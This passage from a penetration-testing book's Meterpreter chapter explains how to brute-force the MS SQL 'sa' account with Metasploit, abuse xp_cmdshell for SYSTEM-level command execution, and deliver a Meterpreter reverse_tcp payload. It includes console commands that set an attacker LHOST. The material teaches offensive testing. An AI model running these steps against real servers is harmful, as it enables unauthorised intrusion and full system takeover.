background image

Meterpreter

79

We select the 

mssql_login

 module at   and point it to the default password 

word list from Fast-Track at  . (We discuss Fast-Track in more detail in Chap-
ter 11.) At  , we have successfully guessed the 

sa

 password: 

password123

NOTE

Fast-Track is a tool created by one of the authors of this book that leverages multiple 
attacks, exploits, and the Metasploit Framework for payload delivery. One of Fast-
Track’s features is its ability to use a brute-forcer to attack and compromise MS SQL 
automatically.

The xp_cmdshell

By running MS SQL from the 

sa

 account, we can execute the stored proce-

dure 

xp_cmdshell

, which lets us interact with the underlying operating system 

and execute commands. The 

xp_cmdshell

 is a built-in stored procedure that 

ships by default with SQL Server. You can call this stored procedure and have 
it query and execute underlying operating system calls directly with MS SQL. 
Think of it as a kind of superuser command prompt that allows you to run 
anything you want on the operating system. When we gain access to the 

sa

 

account, we find that the MS SQL server is generally running with SYSTEM-
level permissions, which allows us full access as an administrator to both 
MS SQL and the machine itself.

To get a payload onto the system, we’ll interact with the 

xp_cmdshell

add a local administrator, and deliver the payload through an executable. 
David Kennedy and Joshua Drake (

jduck

), have written a module (

mssql_payload

that can be used to deliver any Metasploit payload through 

xp_cmdshell

:

msf > 

use windows/mssql/mssql_payload

 

msf exploit(mssql_payload) > 

show options

Module options:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD                       no        The password for the specified username
   RHOST                          yes       The target address
   RPORT         1433             yes       The target port
   USERNAME      sa               no        The username to authenticate as
   UseCmdStager  true             no        Wait for user input before returning from exploit
   VERBOSE       false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(mssql_payload) > 

set payload windows/meterpreter/reverse_tcp

 

payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > 

set LHOST 192.168.33.129

LHOST => 192.168.33.129